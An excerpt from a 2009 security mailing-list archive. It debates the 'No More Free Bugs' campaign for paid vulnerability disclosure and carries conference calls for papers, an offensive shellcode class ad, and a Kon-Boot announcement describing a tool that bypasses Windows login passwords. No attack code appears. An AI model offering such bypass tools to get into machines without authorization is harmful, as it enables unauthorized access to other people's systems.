> it again a week later.  It would be great if WOOT became a showcase of
> the best research of the previous year.
>
> By the way, I've decided instead of getting a blog or twitter account,
> I'll just send emails on daily dave!
>
> Take care,
>
> Charlie
>
> _______________________________________________
> Dailydave mailing list
> Dailydave at lists.immunitysec.com
> http://lists.immunitysec.com/mailman/listinfo/dailydave
>

From joanna at invisiblethingslab.com  Wed Apr  8 14:17:02 2009
From: joanna at invisiblethingslab.com (Joanna Rutkowska)
Date: Wed, 08 Apr 2009 20:17:02 +0200
Subject: [Dailydave] No more free bugs (and WOOT)
In-Reply-To: <D9A50FA9-596E-466A-A581-11786627622C@securityevaluators.com>
References: <D9A50FA9-596E-466A-A581-11786627622C@securityevaluators.com>
Message-ID: <49DCEA1E.1000405@invisiblethingslab.com>

Charles Miller wrote:
> Hi everybody.
> 
> You may have heard some about the No More Free Bugs campaign (http://blog.trailofbits.com/2009/03/22/no-more-free-bugs/ 
> )  Basically, it is the chance for researchers to unite to get paid  
> for the hard work we do.  As long as folks continue to give bugs to  
> companies for free, the companies will never appreciate (or reward)  
> the effort.  So I encourage you all to stop the insanity and stop  
> giving away your hard work.  If you believe in the No More Free Bugs  
> campaign, please include our logo (http://nomorefreebugs.org/logo.jpg)  
> on all of your presentations at security conferences.  I think it  
> would be really great if vendors sat through an entire conference and  
> every talk had this logo on it.  I'll definitely have it on my  
> BlackHat Europe slide deck next week.
> 

And what exactly is your suggested way of making reasonable money on those bugs?
Assuming a legit way, of course?

joanna.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 226 bytes
Desc: OpenPGP digital signature
Url : http://lists.immunitysec.com/pipermail/dailydave/attachments/20090408/68e37a24/attachment-0001.pgp 

From cmiller at securityevaluators.com  Wed Apr  8 14:24:01 2009
From: cmiller at securityevaluators.com (Charles Miller)
Date: Wed, 8 Apr 2009 13:24:01 -0500
Subject: [Dailydave] No more free bugs (and WOOT)
In-Reply-To: <49DCEA1E.1000405@invisiblethingslab.com>
References: <D9A50FA9-596E-466A-A581-11786627622C@securityevaluators.com>
	<49DCEA1E.1000405@invisiblethingslab.com>
Message-ID: <105C42EC-D4F8-4B8E-BAC2-61FDAD4CA8F2@securityevaluators.com>

At this point I'm not even concerned with making "reasonable" money.   
I'd be happy with researchers getting any money.  (I know there are  
stopgap solutions like ZDI which is great, but buying bugs is not  
really their core business)  I'd love to see what would happen if  
nobody reported any bugs for a year.  Would the vendors start paying?   
Would they even care?  I don't have the solution, I just know nothing  
will ever change if the status quo remains.  The only thing we can do  
is stop giving away our work and see what happens.  I think the ideal  
solution would be all the big vendors would have to contribute to some  
fund (held at CERT or something) which could be used to pay  
independent researchers who find and report bugs.  All I know is I  
think we have to draw the line now.

Charlie


On Apr 8, 2009, at 1:17 PM, Joanna Rutkowska wrote:

> Charles Miller wrote:
>> Hi everybody.
>>
>> You may have heard some about the No More Free Bugs campaign (http://blog.trailofbits.com/2009/03/22/no-more-free-bugs/
>> )  Basically, it is the chance for researchers to unite to get paid
>> for the hard work we do.  As long as folks continue to give bugs to
>> companies for free, the companies will never appreciate (or reward)
>> the effort.  So I encourage you all to stop the insanity and stop
>> giving away your hard work.  If you believe in the No More Free Bugs
>> campaign, please include our logo (http://nomorefreebugs.org/ 
>> logo.jpg)
>> on all of your presentations at security conferences.  I think it
>> would be really great if vendors sat through an entire conference and
>> every talk had this logo on it.  I'll definitely have it on my
>> BlackHat Europe slide deck next week.
>>
>
> And what exactly is your suggested way of making reasonable money on  
> those bugs?
> Assuming a legit way, of course?
>
> joanna.
>


From jt at cr0.org  Wed Apr  8 14:23:48 2009
From: jt at cr0.org (Julien TINNES)
Date: Wed, 8 Apr 2009 20:23:48 +0200
Subject: [Dailydave] No more free bugs (and WOOT)
In-Reply-To: <D9A50FA9-596E-466A-A581-11786627622C@securityevaluators.com>
References: <D9A50FA9-596E-466A-A581-11786627622C@securityevaluators.com>
Message-ID: <20090408182348.GA30844@cr0.org>

On Wed, Apr 08, 2009 at 11:17:29AM -0500, Charles Miller wrote:
> Hi everybody.
> 
> You may have heard some about the No More Free Bugs campaign (http://blog.trailofbits.com/2009/03/22/no-more-free-bugs/ 
> )  Basically, it is the chance for researchers to unite to get paid  
> for the hard work we do.  As long as folks continue to give bugs to  
> companies for free, the companies will never appreciate (or reward)  
> the effort.  So I encourage you all to stop the insanity and stop  
> giving away your hard work.  If you believe in the No More Free Bugs  
> campaign, please include our logo (http://nomorefreebugs.org/logo.jpg)  
> on all of your presentations at security conferences.  I think it  
> would be really great if vendors sat through an entire conference and  
> every talk had this logo on it.  I'll definitely have it on my  
> BlackHat Europe slide deck next week.

Hi,

I don't understand the point of the campaign. Why are you trying to
convince people not to report bugs responsibly directly to vendors?
What harm would it do ?
I can understand the reasons for a researcher to sell bugs to ZDI or
iDefense, I cannot understand how it could benefit the general public
if all security researchers would do so.
Are you trying to make vulnerability selling a bigger market so that
prices go higher?

Please, sit on vulnerabilities for months if you think this is what good
security researchers do [1], sell your bugs if you want (and there is
certainly a lot of appeal to do so), but don't try to convince everyone
else this is the way things should work!

Or next year your opponent's efforts may not fall outside the pwn2own 
criteria and you may not win ;)

Julien

[1] http://www.securityfocus.com/news/11549

From cmiller at securityevaluators.com  Wed Apr  8 14:43:22 2009
From: cmiller at securityevaluators.com (Charles Miller)
Date: Wed, 8 Apr 2009 13:43:22 -0500
Subject: [Dailydave] No more free bugs (and WOOT)
In-Reply-To: <20090408182348.GA30844@cr0.org>
References: <D9A50FA9-596E-466A-A581-11786627622C@securityevaluators.com>
	<20090408182348.GA30844@cr0.org>
Message-ID: <A351051D-D67E-477A-AE71-DDE66E8407E2@securityevaluators.com>

Hi Julien,

I think you misunderstand.  I'm all for responsible disclosure.  I  
just think those doing the disclosure should be rewarded for their  
efforts.  (This is how NMFB is fundamentally different from  
antisecurity.is I believe)

As for benefitting the general public, if researchers were actually  
rewarded for their work, more of them would look for (and report)  
vulnerabilities and the public would actually be better off.  Ask  
yourself the question, would more IE bugs be found if the reward was a  
researchers name in an advisory or a bug lump of cash.

I'm not entirely sure what you mean about Pwn2Own, but if you are  
referring to the guy who had the already disclosed Safari bug(s), I  
beat him, not because his bug was already disclosed - and hence fell  
outside the rules, but rather because my name was randomly selected  
first :p

Charlie

On Apr 8, 2009, at 1:23 PM, Julien TINNES wrote:

> On Wed, Apr 08, 2009 at 11:17:29AM -0500, Charles Miller wrote:
>> Hi everybody.
>>
>> You may have heard some about the No More Free Bugs campaign (http://blog.trailofbits.com/2009/03/22/no-more-free-bugs/
>> )  Basically, it is the chance for researchers to unite to get paid
>> for the hard work we do.  As long as folks continue to give bugs to
>> companies for free, the companies will never appreciate (or reward)
>> the effort.  So I encourage you all to stop the insanity and stop
>> giving away your hard work.  If you believe in the No More Free Bugs
>> campaign, please include our logo (http://nomorefreebugs.org/ 
>> logo.jpg)
>> on all of your presentations at security conferences.  I think it
>> would be really great if vendors sat through an entire conference and
>> every talk had this logo on it.  I'll definitely have it on my
>> BlackHat Europe slide deck next week.
>
> Hi,
>
> I don't understand the point of the campaign. Why are you trying to
> convince people not to report bugs responsibly directly to vendors?
> What harm would it do ?
> I can understand the reasons for a researcher to sell bugs to ZDI or
> iDefense, I cannot understand how it could benefit the general public
> if all security researchers would do so.
> Are you trying to make vulnerability selling a bigger market so that
> prices go higher?
>
> Please, sit on vulnerabilities for months if you think this is what  
> good
> security researchers do [1], sell your bugs if you want (and there is
> certainly a lot of appeal to do so), but don't try to convince  
> everyone
> else this is the way things should work!
>
> Or next year your opponent's efforts may not fall outside the pwn2own
> criteria and you may not win ;)
>
> Julien
>
> [1] http://www.securityfocus.com/news/11549


From joanna at invisiblethingslab.com  Wed Apr  8 14:44:16 2009
From: joanna at invisiblethingslab.com (Joanna Rutkowska)
Date: Wed, 08 Apr 2009 20:44:16 +0200
Subject: [Dailydave] No more free bugs (and WOOT)
In-Reply-To: <105C42EC-D4F8-4B8E-BAC2-61FDAD4CA8F2@securityevaluators.com>
References: <D9A50FA9-596E-466A-A581-11786627622C@securityevaluators.com>
	<49DCEA1E.1000405@invisiblethingslab.com>
	<105C42EC-D4F8-4B8E-BAC2-61FDAD4CA8F2@securityevaluators.com>
Message-ID: <49DCF080.6060705@invisiblethingslab.com>

Charles Miller wrote:
> At this point I'm not even concerned with making "reasonable" money. I'd be
> happy with researchers getting any money.

Oh?!

> (I know there are stopgap solutions like ZDI which is great, but buying bugs
> is not really their core business)  I'd love to see what would happen if
> nobody reported any bugs for a year.  Would the vendors start paying?

I see no incentive on their side.

> Would they even care?

Why would they?

Of course, if we assumed that half of those researchers, who stopped notifying
vendors, went underground (I mean commercialized cyber-crime here), then maybe
*some* vendors (e.g. A/V) would be willing to hire more analysts. Of course, the
AV would love the whole situation with more cyber-criminals all around (hush!).
In fact, those few researchers that didn't go underground, would love the
situation too (more jobs offerings).

But the whole point of this initiative, AFAIU, is to find out a *legal* way of
making money on bugs.

> I don't have the solution, I just know nothing will ever change if the status
> quo remains.  The only thing we can do is stop giving away our work and see
> what happens.

And who said, we're giving it away for *free*? Some of us gets recognition for
our research and *legit* consulting/research jobs in return. We show our skills,
we get a job -- this is how it has worked for many years.

Also, maybe finding the n-th QuickTime or Acrobat bug isn't really worth that
much as some of us would like to think (based on what we hear the underground
pays)? While I can totally appreciate and admire a well written exploit, this is
more of an art, rather than something of an utmost importance for the industry.
I mean... what really does this n-th bug for Acrobat (or even exploit) changes?
Proves anything? Maybe such things aren't simply worth that much in the *legit*
world?

> I think the ideal solution would be all the big vendors would have to
> contribute to some fund (held at CERT or something) which could be used to
> pay independent researchers who find and report bugs.

That smells communism to me ;) Not that I remember much of those times
myself, but anyway ;)

joanna.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 226 bytes
Desc: OpenPGP digital signature
Url : http://lists.immunitysec.com/pipermail/dailydave/attachments/20090408/9927b4a3/attachment-0001.pgp 

From jt at cr0.org  Wed Apr  8 18:04:15 2009
From: jt at cr0.org (Julien TINNES)
Date: Thu, 9 Apr 2009 00:04:15 +0200
Subject: [Dailydave] No more free bugs (and WOOT)
In-Reply-To: <A351051D-D67E-477A-AE71-DDE66E8407E2@securityevaluators.com>
References: <D9A50FA9-596E-466A-A581-11786627622C@securityevaluators.com>
	<20090408182348.GA30844@cr0.org>
	<A351051D-D67E-477A-AE71-DDE66E8407E2@securityevaluators.com>
Message-ID: <200904090004.15332.jt@cr0.org>

On Wednesday 08 April 2009, Charles Miller wrote:
> Hi Julien,
>
> I think you misunderstand.  I'm all for responsible disclosure.  I
> just think those doing the disclosure should be rewarded for their
> efforts.  (This is how NMFB is fundamentally different from
> antisecurity.is I believe)

In an ideal world yes, as should people finding other (non-security) bugs.

> As for benefitting the general public, if researchers were actually
> rewarded for their work, more of them would look for (and report)
> vulnerabilities and the public would actually be better off.  Ask
> yourself the question, would more IE bugs be found if the reward was a
> researchers name in an advisory or a bug lump of cash.

If a software company wants to give bounties for this, I think it's a good 
idea, but I'm not sure how this campaign may help. 

If researchers stopped releasing bugs for free, companies would not suddenly 
start paying for them.
Unfortunately most software companies would be perfectly happy without all 
those pesky hackers messing around with their code.

It's already hard to get some software companies care and correct the bugs you 
give them for free (I have numerous examples, as I'm sure you do), I can't 
imagine what the situation would be if they had to buy them.
It may actually give them a perfectly valid excuse for not looking at the bug.

To me, full disclosure would be more of a solution to this particular problem 
than trying to sell bugs. Unfortunately, it has lots of unwanted side effects 
too :)

Julien

From cmiller at securityevaluators.com  Wed Apr  8 21:00:48 2009
From: cmiller at securityevaluators.com (Charles Miller)
Date: Wed, 8 Apr 2009 20:00:48 -0500
Subject: [Dailydave] No more free bugs (and WOOT)
In-Reply-To: <200904090004.15332.jt@cr0.org>
References: <D9A50FA9-596E-466A-A581-11786627622C@securityevaluators.com>
	<20090408182348.GA30844@cr0.org>
	<A351051D-D67E-477A-AE71-DDE66E8407E2@securityevaluators.com>
	<200904090004.15332.jt@cr0.org>
Message-ID: <2BD8033E-79D4-4CD3-ACAF-96EEDC40A800@securityevaluators.com>

Yea, I don't know.  It will hopefully help, but it might not.  I think  
the idea is if good guys stop reporting bugs and good guys and bad  
guys continue to look for (and find) bugs, vendors will be hurt as  
more vulnerabilities will begin to be exploited in the wild than  
otherwise.  Only one thing is for sure, if we don't take any action at  
all, nothing will change.

Charlie


On Apr 8, 2009, at 5:04 PM, Julien TINNES wrote:

>
> If a software company wants to give bounties for this, I think it's  
> a good
> idea, but I'm not sure how this campaign may help.
>


From professor0110 at gmail.com  Wed Apr  8 21:42:56 2009
From: professor0110 at gmail.com (Professor 0110)
Date: Thu, 9 Apr 2009 11:42:56 +1000
Subject: [Dailydave] No more free bugs (and WOOT)
In-Reply-To: <D9A50FA9-596E-466A-A581-11786627622C@securityevaluators.com>
References: <D9A50FA9-596E-466A-A581-11786627622C@securityevaluators.com>
Message-ID: <bbd54e000904081842k252fb3fdlcccef4e89afed6f@mail.gmail.com>

I hope that won't mean that these bugs will stop being released to places
like BugTraq etc. Information Security personal like myself still like to
look at these bugs and on occasion use them.
Cheers,

Professor 0110

On Thu, Apr 9, 2009 at 2:17 AM, Charles Miller <
cmiller at securityevaluators.com> wrote:

> Hi everybody.
>
> You may have heard some about the No More Free Bugs campaign (
> http://blog.trailofbits.com/2009/03/22/no-more-free-bugs/
> )  Basically, it is the chance for researchers to unite to get paid
> for the hard work we do.  As long as folks continue to give bugs to
> companies for free, the companies will never appreciate (or reward)
> the effort.  So I encourage you all to stop the insanity and stop
> giving away your hard work.  If you believe in the No More Free Bugs
> campaign, please include our logo (http://nomorefreebugs.org/logo.jpg)
> on all of your presentations at security conferences.  I think it
> would be really great if vendors sat through an entire conference and
> every talk had this logo on it.  I'll definitely have it on my
> BlackHat Europe slide deck next week.
>
> Also, I'd like to announce the CFP for the 3rd USENIX Workshop on
> Offensive Technologies (WOOT '09).  Check it out at
> http://www.usenix.org/event/woot09/cfp/
> .  This is the only conference around that brings industry and
> academic security folks together.  Its a chance for industry
> researchers to show off their work to the academic community and vice
> versa - I'm being very kind here to academia ;)  Planning on
> submitting something cool to BH USA?  Submit it here too and present
> it again a week later.  It would be great if WOOT became a showcase of
> the best research of the previous year.
>
> By the way, I've decided instead of getting a blog or twitter account,
> I'll just send emails on daily dave!
>
> Take care,
>
> Charlie
>
> _______________________________________________
> Dailydave mailing list
> Dailydave at lists.immunitysec.com
> http://lists.immunitysec.com/mailman/listinfo/dailydave
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20090409/0a0ec620/attachment-0001.htm 

From krahmer at suse.de  Thu Apr  9 05:12:44 2009
From: krahmer at suse.de (Sebastian Krahmer)
Date: Thu, 9 Apr 2009 11:12:44 +0200
Subject: [Dailydave] No more free bugs (and WOOT)
In-Reply-To: <D9A50FA9-596E-466A-A581-11786627622C@securityevaluators.com>
References: <D9A50FA9-596E-466A-A581-11786627622C@securityevaluators.com>
Message-ID: <20090409091244.GA12951@suse.de>


No more free bucks?

On Wed, Apr 08, 2009 at 11:17:29AM -0500, Charles Miller wrote:

> Hi everybody.
> 
> You may have heard some about the No More Free Bugs campaign (http://blog.trailofbits.com/2009/03/22/no-more-free-bugs/ 
> )  Basically, it is the chance for researchers to unite to get paid  
> for the hard work we do.  As long as folks continue to give bugs to  
The hard work we do? Are you kidding? :)
I see dozens of unimportant "bugs" and advisories each day. Some of them
mentioning things I've thrown away during an audit b/c i thought
nobody will ever be interested in it, not to mention even pay
for such silliness.
I have a different opinion for closed source products, but for open
and free software, its fair to give them "free bugs".
Nobody forces you to disclose your sshd 0day, but if its only about the bucks,
we will end up in a weird even more insecure world since ppl are hunting down
bugs in software that offers most profit and developers waiting with bug-reports
until products are released so they can earn money for a report instead of
fixing things right away. Early fixing and correct software becomes a money-loss
and so you will have plenty of buggy servises running.

regards,
Sebastian



-- 
~
~ perl self.pl
~ $_='print"\$_=\47$_\47;eval"';eval
~ krahmer at suse.de - SuSE Security Team
~ SUSE LINUX Products GmbH, GF: Markus Rex, HRB 16746 (AG Nuernberg)


From msuiche at gmail.com  Thu Apr  9 07:15:34 2009
From: msuiche at gmail.com (Matthieu Suiche)
Date: Thu, 9 Apr 2009 13:15:34 +0200
Subject: [Dailydave] No more free bugs (and WOOT)
In-Reply-To: <D9A50FA9-596E-466A-A581-11786627622C@securityevaluators.com>
References: <D9A50FA9-596E-466A-A581-11786627622C@securityevaluators.com>
Message-ID: <36615a170904090415g7a34a160j115e89081f458f4@mail.gmail.com>

Why there is a Coccinellidae with 7 spots on the logo?

--
Matthieu Suiche



On Wed, Apr 8, 2009 at 6:17 PM, Charles Miller
<cmiller at securityevaluators.com> wrote:
> Hi everybody.
>
> You may have heard some about the No More Free Bugs campaign (http://blog.trailofbits.com/2009/03/22/no-more-free-bugs/
> ) ?Basically, it is the chance for researchers to unite to get paid
> for the hard work we do. ?As long as folks continue to give bugs to
> companies for free, the companies will never appreciate (or reward)
> the effort. ?So I encourage you all to stop the insanity and stop
> giving away your hard work. ?If you believe in the No More Free Bugs
> campaign, please include our logo (http://nomorefreebugs.org/logo.jpg)
> on all of your presentations at security conferences. ?I think it
> would be really great if vendors sat through an entire conference and
> every talk had this logo on it. ?I'll definitely have it on my
> BlackHat Europe slide deck next week.
>
> Also, I'd like to announce the CFP for the 3rd USENIX Workshop on
> Offensive Technologies (WOOT '09). ?Check it out at http://www.usenix.org/event/woot09/cfp/
> . ?This is the only conference around that brings industry and
> academic security folks together. ?Its a chance for industry
> researchers to show off their work to the academic community and vice
> versa - I'm being very kind here to academia ;) ?Planning on
> submitting something cool to BH USA? ?Submit it here too and present
> it again a week later. ?It would be great if WOOT became a showcase of
> the best research of the previous year.
>
> By the way, I've decided instead of getting a blog or twitter account,
> I'll just send emails on daily dave!
>
> Take care,
>
> Charlie
>
> _______________________________________________
> Dailydave mailing list
> Dailydave at lists.immunitysec.com
> http://lists.immunitysec.com/mailman/listinfo/dailydave
>

From jim at manico.net  Thu Apr  9 13:15:01 2009
From: jim at manico.net (Jim Manico)
Date: Thu, 9 Apr 2009 07:15:01 -1000
Subject: [Dailydave] OWASP Podcast w/ Dave
References: <D9A50FA9-596E-466A-A581-11786627622C@securityevaluators.com>
	<bbd54e000904081842k252fb3fdlcccef4e89afed6f@mail.gmail.com>
Message-ID: <BA0D96C99B604F01A4EBB299FA4D8A8A@workhorse>

Daily Dave,

OWASP Podcast #16, and interview with Dave Aitel, is now live.

Direct Link: http://www.owasp.org/download/jmanico/owasp_podcast_16.mp3

Cheers!
 - Jim Manico
OWASP Podcast Host

RSS: http://www.owasp.org/download/jmanico/podcast.xml
iTunes: http://itunes.apple.com/WebObjects/MZStore.woa/wa/viewPodcast?id=300769012

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20090409/15cd8711/attachment.htm 

From philippelanglois at free.fr  Mon Apr 13 07:10:55 2009
From: philippelanglois at free.fr (Philippe Langlois)
Date: Mon, 13 Apr 2009 13:10:55 +0200
Subject: [Dailydave] Hacker Space Fest 2009 CFP: Call For Paper
Message-ID: <874BB6FC-11A1-4F30-AB7F-0710EEB86CD1@free.fr>

Hey All,

This may be a bit different than regular CFPs you've seen around :)  
Watch the topics specifically ;-)

Phil.


========================================================================
           /tmp/lab announces the second Hacker Space Festival
                         (Paris, 26-30 June 2009)
========================================================================

Hacker Space Festival 2009 | Call For Proposals | HSF2009

In 2008, we organized HSF[1] on the spot, as an ad-hoc meeting for
hackerspaces-related networks, technical and artistic research emerging
from them and social questionning arising from them. This sudden
experiment proved to be a huge success, as much as on the
self-organizing level as on the participants and meetings quality, as
well as the emotionally-charged ambient, the kind of which you make
fond memories.

The 2008 edition generated a strong emulation in France, from its
historical role as the first official hack meeting there, and in Europe
with the subsequent creation of the Hacker Space Brussels[2], the
rapprochement with The Fiber in Amsterdam and the hackerspaces.org[3]
network. Initiatives of hackerspace openings in Grenoble or Lille, or
the upcoming FrHack[4] conference show an actual enthusiasm in the
French hackers community that was doomed to the "underground" not so
long ago. We salute these initiatives and their diversity!

Soon enough, we wanted to reiterate the HSF experience : however, it
was out of the question to institutionalize this temporary autonomous
zone, nor make it an ersatz of the previous edition, nor even to wrap
it into an "elite" or "underground" aura. On the opposite, we ardently
desire; and especially to explore further, in all directions some
lesser known domains (see below) et foster meeting and sharing around
experiences at the confluence of art, technology and politics.

The world financial crisis, the decay of democracy in Europe, the
obscurantism, paranoia and lack of culture presiding over legislation
(Internet and Reaction... Err... Creation Law[5][6]) seem a fertile
environment for the sensible development of new (social...) life forms.
Quick! Let's rest for a few days in jubilation and ecstasy to take a
deep breathe of freedom under the indelicate smells of the medicine
factory nearby!

For if the public space is shrinking to oblivion, where any side-step
becomes suspect, and that, from an early age (deviant behavior
detection in nursery school), where moving without a mobile phone
becomes suspect (hello you Julien Coupat[7], a French political
prisoner in France!), there's a domain that the Leviathan would have a
lot of trouble to contain, and for a reason: that of sensitivity. Even
the desperate attempts of the State to block the free and premonitory
expression of sense (hello you Demeure du Chaos![8]) cannot do anything
against a loud laughter or a knowing glance, a sensual kiss or an
explosion of colors.

Sensitivity, we could say, is what is left to a human being when she
has nothing anymore, and differenciates her from the body corporate or
the institution, that are, in essence, devoid of it. Therefore, Art
definitely remains the public space to share between humans, and only
between us. And if it the last one to share, we propose to explore it
and take it over during the upcoming edition of the Hacker Space
Festival, from the 26th to 30th of June, 2009 at Vitry sur Seine[9].

========================================================================
     Keynote Speakers: Sergey Grim and Larry Fake with Eric Schmoudt
                 Groogle Summer of Crode, Survivor style
      "VLC, I vote against you because you really fucked up when..."

========================================================================
== W A N T E D =========================================================

Focus on solutions rather than problems.

  * The Final (Hardware) Frontier: Open FPGA Cores, Reverse Engineering
  * Designer Religions and Creative Beliefs Systems
  * WiFiDoors & WiFi System-on-Chip controllers firmware hacking,
    infection & backdooring
  * Telecom Core Network Equipment Reverse Engineering: MSC, STP,
    Switches, ...
  * Algebraic Attacks and Modern Cryptography Attacks
  * Autonomous, Parasitic and Viral Drones
  * Enhanced or Infected Reality Swarms
  * Auto-Builders / Self-Fabrication
  * Embedded OS breakins stories & recipes
  * Actualization rather than mere concepts
  * FPGA & ASIC hacking / backdooring
  * Cloud+Privacy+Open Source: O Brave New World?
  * Explosion-Proof clothing
  * Radio Appz & Hackz: Mesh @ RF Layer 1-3
  * Database & Privacy
  * Problematic & Ethical Open Source/Content Licenses
  * Institutional Relationships: Lobbying or Licking?
  * Non Lethal Protection (anti-taser vests?)
  * Survival in the Age of the Ministry of Immigration and National
    Identity
  * Mental asylum improvised visit
  * Open Source Legacy Media(TM) Production Solutions (TV, Radio, Press,
    DRM)
  * Gas Sensors & Environmental Benchmarking
  * Building Hackerspaces Without Money
  * Milsatcomm hacking: Military satellites shots, broken birds in the
    sky
  * Other research topics on security and insecurity
  * Academics and Hackers
  * Organics and Fermentation
  * Clean Food in Tainted Environment
  * Low Impact Energy & Recycling
  * Media Sandwich: layers of crap makes good food?
  * Deconstructing Carla Sarkozy
  * Knitting DIY Factory (jazzy, eh?)
  * Signs of life among industrial wasteland
  * Hallucinogenic & Computing: Can you Code on Acid?
  * Mesh Networking (Wireless BattleMesh Royal!)
  * Legal Sabotage: When Democracy Needs You

And anything that does not fit.

========================================================================
== P R O P O S E =======================================================

Send you contributions to HSF2009-CFP at lists.tmplab.org

+ Type of the proposal:

  1. conference (45min. presentation + 10min. for questions)
  2. workshop / demo (30min. ? 2 heures)
  3. installation / performance (music, plastic, sound, video)

Lightning talks can be proposed and organized until the last moment,
according to available space and schedule, in the form of BarCamps or
Blitz Conferences.

+ Required Information:

  * Title of the presentation
  * Type (see above)
  * Language : French or English
  * Name of speaker(s)
  * Affiliation (organization / company)
  * Short biography
  * Abstract (5 to 10 lines)
  * Topics / Keywords
  * Includes a demo? YES | NO
  * Release during the festival? YES | NO
  * Internet connection required? YES | NO

+ Acceptable Formats

  * Open Document
  * PDF
  * Plain Text
  * RTF

+ Agenda

  * beginning of proposals    : now
  * end of proposals          : 01 May 2009
  * selection notification    : 07 May 2009
  * publication of program    : 15 May 2009

+ Evaluation criteria for proposals:

  1. Innovating Topic
  2. Open Technology
  3. Demonstration / Live Act
  4. DIY Reproducibility
  5. Fun Potential

The Programming Committee resembles that of last year
See : http://hackerspace.net/committee

========================================================================
== V E N U E ===========================================================

/tmp/lab
6 Bis rue Leon Geffroy
94400 Vitry sur Seine
France

http://hackerspace.net/directions

========================================================================
== P A R T I C I P A T E ===============================================

Email  : http://lists.tmplab.org/listinfo.cgi/hsf2009-talk-tmplab.org
CFPmail: HSF2009-CFP at lists.tmplab.org
IRC    : irc://irc.freenode.net/frlab
Jabber : xmpp:hsf2009 at space.cepheide.org?join
Wiki   : http://hackerspace.net/hsf2009

========================================================================
== L I N K S ===========================================================

The CFP is available online at http://hackerspace.net/cfp

[1]  http://hackerspace.net/hsf2008
[2]  http://hsb.wikidot.com/
[3]  http://hackerspaces.org/
[4]  http://www.frhack.org/
[5]  http://jaimelesautistes.fr/
[6]  http://laquadrature.net/
[7]  http://fr.wikipedia.org/wiki/Julien_Coupat
[8]  http://www.demeureduchaos.org/
[9]  http://hackerspace.net/



--
Philippe Langlois
Email: philippelanglois at free.fr
PGP Key: 8DAEE244





From prabu at hackinthebox.org  Wed Apr 15 00:03:14 2009
From: prabu at hackinthebox.org (S. Praburaajan)
Date: Wed, 15 Apr 2009 12:03:14 +0800
Subject: [Dailydave] HITBSecConf2009 - Malaysia: Call for Papers
Message-ID: <49E55C82.7080905@hackinthebox.org>

The Call for Papers for HITB Security Conference 2009 Malaysia is now open!

Talks that are more technical or that discuss new and never before seen
attack methods are of more interest than a subject that has been covered
several times before. Summaries not exceeding 1250 words should be
submitted (in plain text format) to cfp -at- hackinthebox.org for review
and possible inclusion in the programme.

Submissions are due no later than 31st July 2009

TOPICS

Topics of interest include, but are not limited to the following:

# 3G/4G Cellular Networks
# Apple / OS X security vulnerabilities
# SS7/Backbone telephony networks
# VoIP security
# Firewall technologies
# Intrusion detection
# Data Recovery, Forensics and Incident Response
# HSDPA and CDMA Security
# WIMAX Security
# Identification and Entity Authentication
# Network Protocol and Analysis
# Smart Card and Physical Security
# Virus and Worms
# WLAN, GPS, HAM Radio, Satellite, RFID and Bluetooth Security
# Analysis of malicious code
# Applications of cryptographic techniques
# Analysis of attacks against networks and machines
# File system security
# Security of Embedded Devices
# Side Channel Analysis of Hardware Devices

PLEASE NOTE:

We do not accept product or vendor related pitches. If your talk
involves an advertisement for a new product or service your company is
offering, please do not submit.

Your submission should include:

# Name, title, address, email and phone/contact number
# Short biography, qualification, occupation (limit 250 words)
# Summary or abstract for your presentation (limit 1250 words)
# Technical requirements (video, internet, wireless, audio, etc.)

Each non-resident speaker will receive accommodation for 2 nights/3
days. For each non-resident speaker, HITB will cover travel expenses up
to USD 1,200.00.

HITBSecConf2009 - Malaysia
http://conference.hackinthebox.org/hitbsecconf2009kl/

From bania.piotr at gmail.com  Thu Apr 16 01:17:37 2009
From: bania.piotr at gmail.com (Piotr Bania)
Date: Thu, 16 Apr 2009 07:17:37 +0200
Subject: [Dailydave] KON-BOOT for Windows and Linux (Password Bypassing
	Utility for Forgetting Heads)
Message-ID: <000301c9be52$a9078d90$5ee91953@DIED>

Hello,


As one of my past projects for KryptosLogic[1] Kon-Boot was moved to Windows 
platforms. So now it provides support for Microsoft Windows systems and also 
the Linux systems covered in previous releases. Kon-Boot for Windows enables 
logging in to any password protected machine profile >>> without without any 
knowledge of the password <<<. This tool changes the contents of Windows 
kernel while booting, everything is done virtually - without any 
interferences with physical system changes. So far following Windows systems 
were tested to work correctly with Kon-Boot (however its quite possible 
other versions of listed Windows systems may be suitable as well):

Currently supported Microsoft windows systems:
+ Windows Server 2008 Standard SP2 (v.275)
+ Windows Vista Business SP0
+ Windows Vista Ultimate SP1
+ Windows Vista Ultimate SP0
+ Windows Server 2003 Enterprise
+ Windows XP
+ Windows XP SP1
+ Windows XP SP2
+ Windows XP SP3
+ Windows 7


Kon-Boot also works with virtual machines like VMware or VirtualPC.

No special usage instructions are required for Windows users, just boot from 
Kon-Boot CD/Floppy, select your profile and put any password you want. You 
lost your password? Now it doesnt matter at all :-)


You can download Kon-Boot Windows&Linux version from the project website:
http://piotrbania.com/all/kon-boot/


Please note:
You may use this software only for personal, legal and non-commercial 
activity.


best regards,
Piotr Bania


[1] http://kryptoslogic.com


-- 
--------------------------------------------------------------------
Piotr Bania - <bania.piotr at gmail.com> - 0xCD, 0x19
Fingerprint: 413E 51C7 912E 3D4E A62A  BFA4 1FF6 689F BE43 AC33
http://www.piotrbania.com  - Key ID: 0xBE43AC33
--------------------------------------------------------------------

               - "The more I learn about men, the more I love dogs."



From dave at immunityinc.com  Thu Apr 16 10:51:01 2009
From: dave at immunityinc.com (dave)
Date: Thu, 16 Apr 2009 10:51:01 -0400
Subject: [Dailydave] Kostya teaches you how to write shellcode in Hong Kong!
Message-ID: <49E745D5.6030305@immunityinc.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

So, when he's not writing CLOUDBURST-level exploits, Kostya has a
tendency to rewrite CANVAS's Windows shellcode. As Justine would say
"Shellcode is not hard, why does everyone go on about that?" But if
you've never written shellcode before, or if you only have written Linux
shellcode, Kostya's class will be perfect to get you up to speed from
... well...Kostya. :>

First Day's SyScan 09 HK program (Don't miss Kostya's talk!):
http://syscan.org/hk/program.html

See Kostya's class here on day 2:
http://syscan.org/hk/program_day2.html

"""
A 4 hours workshop, taught by a leading Immunity researcher, that
introduces students to the fundamental requirement of preparing exploits
for Windows machines: the development of Windows shellcode.

Topics covered in this half-day, hands-on session include i386 assembler
